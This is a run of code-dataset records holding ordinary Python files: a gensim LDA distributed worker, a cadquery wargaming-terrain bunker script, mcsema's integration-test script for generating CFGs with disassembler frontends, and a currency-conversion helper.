"call"}, {"api_name": "settings.settings.settings", "line_number": 490, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 490, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSettings", "line_number": 497, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 497, "usage_type": "name"}, {"api_name": "settings.settings.settings", "line_number": 503, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 503, "usage_type": "name"}, {"api_name": "settings.settings.settings", "line_number": 504, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 504, "usage_type": "name"}, {"api_name": "sequence.SampleTreeItem", "line_number": 518, "usage_type": "name"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 524, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 526, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 528, "usage_type": "argument"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 535, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 537, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 539, "usage_type": "argument"}, {"api_name": "core.position.Position", "line_number": 549, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 565, "usage_type": "call"}, {"api_name": "os.path", "line_number": 565, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 572, "usage_type": "call"}, {"api_name": "os.path", "line_number": 572, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 573, "usage_type": "call"}, {"api_name": "settings.settings.settings.get", "line_number": 577, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 577, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 577, "usage_type": "name"}, {"api_name": "sequence.GroupTreeItem", "line_number": 608, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 612, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 616, "usage_type": "argument"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 620, "usage_type": "argument"}, {"api_name": "alignment.safe_z_position", "line_number": 648, "usage_type": "call"}, {"api_name": "sequence.GroupTreeItem", "line_number": 657, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 661, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 665, "usage_type": "argument"}, {"api_name": "sequence.SequenceRootTreeItem", "line_number": 672, "usage_type": "call"}, {"api_name": "sequence.StartSequenceDialog", "line_number": 673, "usage_type": "call"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 689, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 692, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 692, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 692, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 693, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 693, "usage_type": "name"}, {"api_name": "sequence.ContactTreeItem", "line_number": 696, "usage_type": "name"}, {"api_name": "sequence.StartSequenceDialog", "line_number": 697, "usage_type": "call"}, {"api_name": "sequence.SampleTreeItem", "line_number": 714, "usage_type": "name"}, {"api_name": "sequence.StartSequenceDialog", "line_number": 715, "usage_type": "call"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 736, "usage_type": "argument"}, {"api_name": "sequence.ContactTreeItem", "line_number": 738, "usage_type": "argument"}, {"api_name": "sequence.SampleTreeItem", "line_number": 740, "usage_type": "argument"}, {"api_name": "sequence.GroupTreeItem", "line_number": 742, "usage_type": "argument"}, {"api_name": "core.config", "line_number": 755, "usage_type": "name"}, {"api_name": "settings.settings.table_contact_delay", "line_number": 757, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 757, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_radius", "line_number": 758, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 758, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_distance", "line_number": 759, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 759, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_overdrive", "line_number": 760, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 760, "usage_type": "name"}, {"api_name": "settings.settings.retry_contact_count", "line_number": 761, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 761, "usage_type": "name"}, {"api_name": "settings.settings.retry_measurement_count", "line_number": 762, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 762, "usage_type": "name"}, {"api_name": "settings.settings.export_json", "line_number": 764, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 764, "usage_type": "name"}, {"api_name": "settings.settings.export_txt", "line_number": 765, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 765, "usage_type": "name"}, {"api_name": "workers.measure.MeasureWorker", "line_number": 774, "usage_type": "call"}, {"api_name": "core.config", "line_number": 774, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 792, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 823, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 823, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QColor", "line_number": 823, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 835, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 835, "usage_type": "name"}, {"api_name": "settings.settings.settings.get", "line_number": 838, "usage_type": "call"}, {"api_name": "settings.settings.settings", "line_number": 838, "usage_type": "attribute"}, {"api_name": "settings.settings", "line_number": 838, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 853, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 853, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 853, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 854, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 854, "usage_type": "name"}, {"api_name": "sequencemanager.load_all_sequences", "line_number": 868, "usage_type": "call"}, {"api_name": "settings.settings", "line_number": 868, "usage_type": "argument"}, {"api_name": "sequence.EditSamplesDialog", "line_number": 869, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 876, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 876, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 876, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 877, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 877, "usage_type": "name"}, {"api_name": "sequence.MeasurementTreeItem", "line_number": 879, "usage_type": "argument"}, {"api_name": "alignment.AlignmentDialog", "line_number": 903, "usage_type": "call"}, {"api_name": "sequence.ContactTreeItem", "line_number": 925, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 993, "usage_type": "call"}, {"api_name": "math.isfinite", "line_number": 995, "usage_type": "call"}, {"api_name": "core.position.Position", "line_number": 1004, "usage_type": "call"}, {"api_name": "core.position.Position", "line_number": 1005, "usage_type": "call"}]}
+{"seq_id": "38637132431", "text": "from __future__ import with_statement\nimport os\nimport sys\nimport logging\nimport threading\nimport tempfile\nimport argparse\n\ntry:\n import Queue\nexcept ImportError:\n import queue as Queue\nimport Pyro4\nfrom gensim.models import ldamodel\nfrom gensim import utils\n\nlogger = logging.getLogger('gensim.models.lda_worker')\n\n\n# periodically save intermediate models after every SAVE_DEBUG updates (0 for never)\nSAVE_DEBUG = 0\n\nLDA_WORKER_PREFIX = 'gensim.lda_worker'\n\n\nclass Worker(object):\n def __init__(self):\n self.model = None\n\n @Pyro4.expose\n def initialize(self, myid, dispatcher, **model_params):\n self.lock_update = threading.Lock()\n self.jobsdone = 0 # how many jobs has this worker completed?\n # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?\n self.myid = myid\n self.dispatcher = dispatcher\n self.finished = False\n logger.info(\"initializing worker #%s\", myid)\n self.model = ldamodel.LdaModel(**model_params)\n\n @Pyro4.expose\n @Pyro4.oneway\n def requestjob(self):\n \"\"\"\n Request jobs from the dispatcher, in a perpetual loop until `getstate()` is called.\n \"\"\"\n if self.model is None:\n raise RuntimeError(\"worker must be initialized before receiving jobs\")\n\n job = None\n while job is None and not self.finished:\n try:\n job = self.dispatcher.getjob(self.myid)\n except Queue.Empty:\n # no new job: try again, unless we're finished with all work\n continue\n if job is not None:\n logger.info(\"worker #%s received job #%i\", self.myid, self.jobsdone)\n self.processjob(job)\n self.dispatcher.jobdone(self.myid)\n else:\n logger.info(\"worker #%i stopping asking for jobs\", self.myid)\n\n @utils.synchronous('lock_update')\n def processjob(self, job):\n logger.debug(\"starting to process job #%i\", self.jobsdone)\n self.model.do_estep(job)\n self.jobsdone += 1\n if SAVE_DEBUG and self.jobsdone % SAVE_DEBUG == 0:\n fname = os.path.join(tempfile.gettempdir(), 'lda_worker.pkl')\n self.model.save(fname)\n logger.info(\"finished processing job #%i\", self.jobsdone - 1)\n\n @Pyro4.expose\n def ping(self):\n return True\n\n @Pyro4.expose\n @utils.synchronous('lock_update')\n def getstate(self):\n logger.info(\"worker #%i returning its state after %s jobs\", self.myid, self.jobsdone)\n result = self.model.state\n assert isinstance(result, ldamodel.LdaState)\n self.model.clear() # free up mem in-between two EM cycles\n self.finished = True\n return result\n\n @Pyro4.expose\n @utils.synchronous('lock_update')\n def reset(self, state):\n assert state is not None\n logger.info(\"resetting worker #%i\", self.myid)\n self.model.state = state\n self.model.sync_state()\n self.model.state.reset()\n self.finished = False\n\n @Pyro4.oneway\n def exit(self):\n logger.info(\"terminating worker #%i\", self.myid)\n os._exit(0)\n\n\ndef main():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"--host\", help=\"Nameserver hostname (default: %(default)s)\", default=None)\n parser.add_argument(\"--port\", help=\"Nameserver port (default: %(default)s)\", default=None, type=int)\n parser.add_argument(\n \"--no-broadcast\", help=\"Disable broadcast (default: %(default)s)\", action='store_const',\n default=True, const=False\n )\n parser.add_argument(\"--hmac\", help=\"Nameserver hmac key (default: %(default)s)\", default=None)\n parser.add_argument(\n '-v', '--verbose', help='Verbose flag', action='store_const', dest=\"loglevel\",\n const=logging.INFO, default=logging.WARNING\n )\n args = parser.parse_args()\n\n logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=args.loglevel)\n logger.info(\"running %s\", \" \".join(sys.argv))\n\n ns_conf = {\n \"broadcast\": args.no_broadcast,\n \"host\": args.host,\n \"port\": args.port,\n \"hmac_key\": args.hmac\n }\n utils.pyro_daemon(LDA_WORKER_PREFIX, Worker(), random_suffix=True, ns_conf=ns_conf)\n logger.info(\"finished running %s\", \" \".join(sys.argv))\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "alex-tifrea/poincare_glove", "sub_path": "gensim/models/lda_worker.py", "file_name": "lda_worker.py", "file_ext": "py", "file_size_in_byte": 4395, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 81, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.models.ldamodel.LdaModel", "line_number": 39, "usage_type": "call"}, {"api_name": "gensim.models.ldamodel", "line_number": 39, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 30, "usage_type": "attribute"}, {"api_name": "queue.Empty", "line_number": 54, "usage_type": "attribute"}, {"api_name": "Pyro4.expose", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Pyro4.oneway", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 70, "usage_type": "call"}, {"api_name": "gensim.utils.synchronous", "line_number": 64, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 64, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 74, "usage_type": "attribute"}, {"api_name": "gensim.models.ldamodel.LdaState", "line_number": 83, "usage_type": "attribute"}, {"api_name": "gensim.models.ldamodel", "line_number": 83, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 78, "usage_type": "attribute"}, {"api_name": "gensim.utils.synchronous", "line_number": 79, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 79, "usage_type": "name"}, {"api_name": "Pyro4.expose", "line_number": 88, "usage_type": "attribute"}, {"api_name": "gensim.utils.synchronous", "line_number": 89, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 89, "usage_type": "name"}, {"api_name": "os._exit", "line_number": 101, "usage_type": "call"}, {"api_name": "Pyro4.oneway", "line_number": 98, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 115, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 115, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 119, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 120, "usage_type": "attribute"}, {"api_name": "gensim.utils.pyro_daemon", "line_number": 128, "usage_type": "call"}, {"api_name": "gensim.utils", "line_number": 128, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 129, "usage_type": "attribute"}]}
+{"seq_id": "29466941242", "text": "import cadquery as cq\nfrom skirmishbunker import Bunker, SplitDoor\nfrom cqterrain import tile\nfrom cadqueryhelper import shape\n\ndef custom_star_tile(bunker):\n star_tile = tile.star(\n length = bunker.floor_tile_size,\n width = bunker.floor_tile_size,\n height = bunker.floor_tile_height,\n points = 4,\n outer_radius = bunker.floor_tile_size/2,\n inner_radius = 2,\n padding = .5\n )\n return star_tile\n\ndef custom_windmill_tile(bunker):\n windmill_tile = tile.windmill(\n tile_size = bunker.floor_tile_size,\n height = bunker.floor_tile_height,\n padding = .5\n )\n return windmill_tile\n\ndef custom_cut_door(bunker):\n height = bunker.height\n p_length = bunker.panel_length\n p_width = bunker.panel_width\n padding = bunker.panel_padding\n door_cut_width = bunker.inset+bunker.wall_width\n\n padding_top = 3.2\n\n if bunker.inset<0:\n door_cut_width = -1*(bunker.inset)+bunker.wall_width\n\n cut = (\n shape.arch_pointed(24, door_cut_width, 49, 27.3)\n .translate((0,-0,-3))\n )\n\n cut = shape.arch_pointed(\n p_length - bunker.inner_arch_sides,\n door_cut_width,\n height - padding - bunker.inner_arch_top - bunker.wall_width+1 -padding_top,\n ((height - padding)/2) + bunker.arch_inner_height - bunker.inner_arch_sides - bunker.wall_width+1 - padding_top\n ).translate((0,0,-4 + bunker.wall_width /2 - padding_top / 2))\n\n return cut\n\ndef custom_door(bunker):\n height = bunker.height\n p_length = bunker.panel_length\n padding = bunker.panel_padding\n padding_top = 3.2\n\n bp = SplitDoor()\n bp.length = p_length - bunker.inner_arch_sides\n bp.height = height - padding - bunker.inner_arch_top - bunker.wall_width+1 -padding_top\n bp.width = 1\n bp.base_height = ((height - padding)/2) + bunker.arch_inner_height - bunker.inner_arch_sides - bunker.wall_width+1 - padding_top\n bp.open = 6\n bp.make()\n door = bp.build()\n #return door.translate((0,0,0))\n return door.translate((0,-1,-4 + bunker.wall_width /2 - padding_top / 2))\n\n\nbp = Bunker()\nbp.inset=0\nbp.width=75\nbp.length=75\nbp.height=65\nbp.wall_width =6\n\nbp.render_panel_details=True\nbp.panel_length=28\nbp.panel_width = 5\nbp.panel_padding = 4\n\nbp.render_windows=True\nbp.skip_windows = []\nbp.window_length = 8\nbp.window_height = 24\nbp.window_frame_chamfer = 1.6\nbp.window_frame_chamfer_select = \" Creating directory: \" + path)\n try:\n os.makedirs(path)\n except:\n print(\"[Error] could not create directory \" + path)\n\n\ndef is_batch_dir_sane(batch_name):\n for filename in os.listdir(batch_name):\n name, extension = os.path.splitext(filename)\n\n fullname = os.path.join(batch_name, filename)\n if ((os.path.isfile(fullname) and extension != \".cfg\") or \\\n (os.path.isdir(fullname) and filename != log_dir_name)):\n return False\n return True\n\ndef is_valid_binary(binary_name):\n bin_path = os.path.join(bin_dir, binary_name)\n return os.path.isfile(bin_path)\n\n# Return (list of filtered names, number of files that are missing)\ndef get_binaries_from_tags(desired):\n binaries = []\n missing = 0\n\n # We want to get cfg for everything\n get_all = ALL_TAG in desired\n\n bin2tag = util.get_bin2tags(tags_dir)\n\n for binary, tags in bin2tag.items():\n if get_all or any(x in desired for x in tags):\n if not is_valid_binary(binary):\n print(colors.bg_yellow(\n \" > Skipping \" + binary+ \" : file missing\"))\n missing = missing + 1\n else:\n print(\" > Selecting \" + binary)\n binaries.append(binary)\n\n return (binaries, missing)\n\ndef create_batch_dir(batch, policy):\n batch_name = batch + \"_cfg\"\n if batch_name not in os.listdir():\n print(\" > Batch name is unique\")\n make_dir(batch_name)\n make_dir(os.path.join(batch_name, log_dir_name))\n return batch_name\n\n print(\" > Batch with same name already exists\")\n print(\" > Selected policy is \" + policy)\n\n if policy == \"D\":\n print(\" > Removing old batch\")\n if is_batch_dir_sane(batch_name):\n shutil.rmtree(batch_name)\n make_dir(batch_name)\n make_dir(os.path.join(batch_name, log_dir_name))\n else:\n print(\" > Batch folder is not sane, remove manually\")\n sys.exit(1)\n return batch_name\n\n# From lift_program.py\ndef binary_libraries(binary):\n try:\n res = subprocess.check_output(['ldd', binary]).decode()\n except:\n print(\" \\t[W] ldd failed for \" + binary)\n return\n\n for line in res.split(\"\\n\"):\n if \"=>\" not in line:\n continue\n name, path_and_addr = line.split(\" => \")\n path_and_addr = path_and_addr.strip(\" \")\n if not path_and_addr.startswith(\"/\"):\n continue\n\n lib = \" \".join(path_and_addr.split(\" \")[:-1])\n lib = os.path.realpath(lib)\n\n if os.path.isfile(lib):\n yield name.strip(), lib\n\n\ndef update_shared_libraries(binary):\n if not os.path.isdir(so_dir):\n print(\" > Creating \" + so_dir)\n os.mkdir(so_dir)\n\n for name, path in binary_libraries(binary):\n if name in os.listdir(so_dir):\n continue\n\n sym_name = os.path.join(so_dir, name)\n\n try:\n print(\" \\t> \" + sym_name + \" => \" + path)\n os.symlink(path, sym_name)\n except:\n pass\n\n# From lift_program.py\n# Most likely there will be only x86-64 binaries for the time being,\n# but it won't hurt to have it in place once we decide to add another tests\ndef binary_info(binary):\n res = subprocess.check_output(['file', binary]).decode()\n is_pie = 'LSB shared object' in res or 'Mach-O 64' in res or 'LSB pie executable' in res\n address_size = 64\n\n if 'aarch64' in res:\n arch = 'aarch64'\n elif 'x86-64' in res or 'x86_64' in res:\n arch = 'amd64_avx'\n elif 'x86' in res:\n arch = 'x86_avx'\n address_size = 32\n else:\n raise Exception(\"Unknown architecture for file type {}\".format(res))\n\n return address_size, arch, is_pie\n\n\ndef dyninst_frontend(binary, cfg, args, log_file):\n address_size, arch, is_pie = binary_info(binary)\n\n disass_args = [\n \"mcsema-dyninst-disass\",\n \"--arch\", arch,\n # TODO: Portability\n \"--os\", \"linux\",\n \"--binary\", quote(binary),\n \"--output\", quote(cfg),\n \"--entrypoint\", \"main\",\n \"--std_defs\", args.std_defs ]\n\n if is_pie:\n disass_args.append(\"--pie_mode\")\n # TODO: May not be needed\n disass_args.append(\"true\")\n\n # TODO: This is too verbose for normal output\n #print(\" \\t> \" + \" \".join(disass_args))\n\n ret = subprocess.call(disass_args)\n if ret:\n return FAIL\n return SUCCESS\n\n# TODO: Testing REQUIRED\ndef ida_frontend(binary, cfg, args, log_file):\n address_size, arch, is_pie = binary_info(binary)\n\n disass_args = [\n 'mcsema-disass',\n '--arch', arch,\n '--os', 'linux',\n '--binary', quote(binary),\n '--output', quote(cfg),\n '--entrypoint', 'main',\n '--log_file', log_file,\n '--disassembler', args.path_to_disass]\n\n if is_pie:\n disass_args.append(\"--pie_mode\")\n\n print(\" \\t> \" + \" \".join(disass_args))\n ret = subprocess.call(disass_args)\n if ret:\n return FAIL\n return SUCCESS\n\ndef binja_frontend(binary, cfg, args, log_file):\n print(\" > Not implemented\")\n sys.exit(1)\n\n\n# TODO: We may want for each file to be lifted in separate directory and on a copy\n# (in the case frontend is broken and modifies the original itself)\ndef get_cfg(*t_args, **kwargs):\n todo, args, lifter, result = t_args\n\n while not todo.empty():\n\n try:\n binary, cfg = todo.get()\n except queue.Empty:\n return\n\n bin_path = os.path.join(bin_dir, binary)\n\n print(\"\\n > Processing \" + bin_path)\n update_shared_libraries(bin_path)\n\n log_file = os.path.join(args.batch + \"_cfg\", log_dir_name, binary + \".log\")\n result[binary] = lifter(bin_path, cfg, args, log_file)\n\n# TODO: Handle other frontends\ndef get_lifter(disass):\n if disass == \"dyninst\":\n return dyninst_frontend\n if disass == \"ida\":\n return ida_frontend\n print(\" > Support for chosen frontend was not implemented yet!\")\n sys.exit(1)\n\ndef print_result(result, missing):\n print(\"\\nResults:\")\n stat = dict()\n for key, val in sorted(result.items(), key=operator.itemgetter(0)):\n print(key.ljust(30).rjust(30 + INDENT) + colors.get_bin_result(val) +\n (MESSAGES[val]).rjust(5) + colors.clean())\n if val in stat:\n stat[val] += 1\n else:\n stat[val] = 1\n print(\"\\nTotal:\")\n for key, val in MESSAGES.items():\n print(val)\n if key not in stat:\n print(\" \" * INDENT, str(0))\n else:\n print(\" \" * INDENT, stat[key])\n print(\"\\nMissing:\")\n print(\" \" * INDENT, missing)\n\ndef main():\n arg_parser = argparse.ArgumentParser()\n\n arg_parser.add_argument(\n \"--disass\",\n help='Frontend tobe used: ida | binja | dyninst',\n choices=[\"ida\", \"binja\", \"dyninst\"],\n required=True)\n\n arg_parser.add_argument(\n \"--path_to_disass\",\n help=\"Path to disassembler, needed in case ida is chosen as frontend\",\n default=None,\n required=False)\n\n arg_parser.add_argument(\n \"--tags\",\n help=\"Flavors to be lifted\",\n nargs=\"+\",\n required=True)\n\n arg_parser.add_argument(\n \"--dry_run\",\n help=\"Should actual commands be executed?\",\n default=False,\n required=False)\n\n arg_parser.add_argument(\n \"--batch\",\n help=\"Specify batch name\",\n required=True)\n arg_parser.add_argument(\n \"--batch_policy\",\n choices=[\"D\", \"U\", \"C\"],\n help=\"How to resolve already existing batch\\n D: delete all old cfgs\\nU: Update all\\nC: create only missing\",\n default=\"D\",\n required=False)\n\n arg_parser.add_argument(\n \"--std_defs\",\n help=\"In case frontend still supports/needs it, can be found with McSema sources\",\n default=\"../../tools/mcsema_disass/defs/linux.txt\",\n required=False)\n\n arg_parser.add_argument(\n '--jobs',\n help = \"Number of threads to use\",\n default = 1,\n required = False)\n\n args, command_args = arg_parser.parse_known_args()\n\n\n if args.disass == \"ida\":\n if args.path_to_disass is None:\n print(\"IDA frontend is selected but --path_to_disass is not\")\n sys.exit(1)\n if not os.path.isfile(args.path_to_disass):\n print(\"IDA frontend is selected but --path_to_disass is not a file\")\n sys.exit(1)\n\n print(\"Checking batch name\")\n batch_dir = create_batch_dir(args.batch, args.batch_policy)\n\n print(\"Select all binaries, specified by tags\")\n binaries, missing = get_binaries_from_tags(args.tags)\n\n result = dict()\n print(\"\\nIterating over binaries\")\n\n todo = queue.Queue()\n\n for b in binaries:\n cfg = os.path.join(batch_dir, b + \".cfg\")\n if args.batch_policy == \"C\" and os.path.isfile(cfg):\n print(\" \\t> \" + cfg + \" is already present, not updating\")\n result[b] = IGNORED\n else:\n todo.put((b, cfg))\n\n threads = []\n for i in range(int(args.jobs)):\n t = threading.Thread(\n target=get_cfg, args=(todo, args, get_lifter(args.disass), result))\n t.start()\n threads.append(t)\n\n for t in threads:\n t.join()\n\n print_result(result, missing)\n\n return 0\n\nif __name__ == '__main__':\n main()\n", "repo_name": "lifting-bits/mcsema", "sub_path": "tests/integration_tests/get_cfg.py", "file_name": "get_cfg.py", "file_ext": "py", "file_size_in_byte": 9803, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2539, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.makedirs", "line_number": 34, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "util.get_bin2tags", "line_number": 61, "usage_type": "call"}, {"api_name": "colors.bg_yellow", "line_number": 66, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 94, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 123, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "os.symlink", "line_number": 133, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 141, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 166, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 167, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 179, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 192, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 193, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 202, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 209, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 221, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 229, "usage_type": "call"}, {"api_name": "os.path", "line_number": 229, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 239, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 244, "usage_type": "call"}, {"api_name": "colors.get_bin_result", "line_number": 245, "usage_type": "call"}, {"api_name": "colors.clean", "line_number": 246, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 262, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 318, "usage_type": "call"}, {"api_name": "os.path", "line_number": 318, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 320, "usage_type": "call"}, {"api_name": "queue.Queue", "line_number": 331, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 334, "usage_type": "call"}, {"api_name": "os.path", "line_number": 334, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 343, "usage_type": "call"}]}
+{"seq_id": "33850202011", "text": "import requests\nimport json\nfrom config import keys\n\n\nclass ConvertException(Exception):\n pass \n\nclass CryptoConvertor:\n \n @staticmethod\n def convert(quote: str, base: str, amount: str):\n \n if quote == base:\n raise ConvertException(f'Невозможно перевести одинаковые валюты {base}.')\n\n try:\n quote_ticker = keys[quote]\n except KeyError:\n raise ConvertException(f'Не удалось обработать валюту {quote}.')\n\n try:\n base_ticker = keys[base]\n except KeyError:\n raise ConvertException(f'Не удалось обработать валюту {base}.')\n\n try:\n amount = float(amount)\n except ValueError:\n raise ConvertException(f'Не удалось обработать количество {amount}.')\n ruble_json = requests.get(f'https://api.exchangeratesapi.io/latest?symbols=RUB')\n #print(ruble_json)\n dollar_json = requests.get(f'https://api.exchangeratesapi.io/latest?symbols=USD')\n ruble_rate = float(json.loads(ruble_json.content)['rates']['RUB'])\n dollar_rate = float(json.loads(dollar_json.content)['rates']['USD'])\n if base_ticker == \"EUR\":\n if quote_ticker == \"RUB\":\n return round((1 / ruble_rate) * float(amount), 1)\n if quote_ticker == \"USD\":\n return round((1 / dollar_rate) * float(amount), 1)\n if base_ticker == \"USD\":\n if quote_ticker == \"EUR\":\n return round(dollar_rate * float(amount), 2)\n if quote_ticker == \"RUB\":\n return round(((dollar_rate/ruble_rate) * float(amount)), 2)\n \n if base_ticker == \"RUB\":\n if quote_ticker == \"EUR\":\n return round(ruble_rate * float(amount), 2)\n if quote_ticker == \"USD\":\n return round(((ruble_rate/dollar_rate) * float(amount)), 2)\n 